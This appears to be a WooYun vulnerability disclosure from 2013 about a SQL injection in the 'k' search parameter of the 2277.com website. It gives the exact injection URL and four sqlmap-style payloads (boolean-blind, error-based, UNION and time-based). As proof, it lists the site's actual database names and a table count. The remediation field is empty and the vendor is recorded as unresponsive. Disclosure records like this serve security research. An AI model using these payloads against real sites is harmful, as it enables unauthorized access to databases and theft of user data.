Vulnerability Summary
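Vulnerability title: SQL injection vulnerability in the 2277.com main site
Submitted: 2013-07-25 23:33
Fixed: 2013-09-08 23:34
Disclosed: 2013-09-08 23:34
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 15
Vulnerability status: Unable to contact the vendor, or the vendor actively ignored the report
Tags:
None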
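Vulnerability Details
Disclosure status:
2013-07-25: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2013-09-08: The vendor has actively ignored the vulnerability; details are disclosed to the public
Brief description: SQL injection vulnerability in the www.2277.com main site; data for the entire site is exposed
Detailed description:
Injection point: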
http://www.2277.com/index.php?r=search/course&k=123
Injection parameter: k
---
Place: GET
Parameter: k
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: r=search/course&k=123' AND 8835=8835#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: r=search/course&k=123' AND (SELECT 5293 FROM(SELECT COUNT(*),CONCAT(0x7168746571,(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE 0 END)),0x716e797171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QONP'='QONP

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: r=search/course&k=-1912' UNION ALL SELECT CONCAT(0x7168746571,0x59587a694d7a48595554,0x716e797171),NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: r=search/course&k=123' AND SLEEP(5) AND 'wMJu'='wMJu
---
Proof of vulnerability:
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
available databases [9]:
[*] 2277_bbs
[*] bbs_v2
[*] bill
[*] edu_db
[*] f2f
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Database: f2f
[124 tables]
Remediation:
Copyright notice: When reposting, please credit the source: c2c2 @ WooYun
Vulnerability Response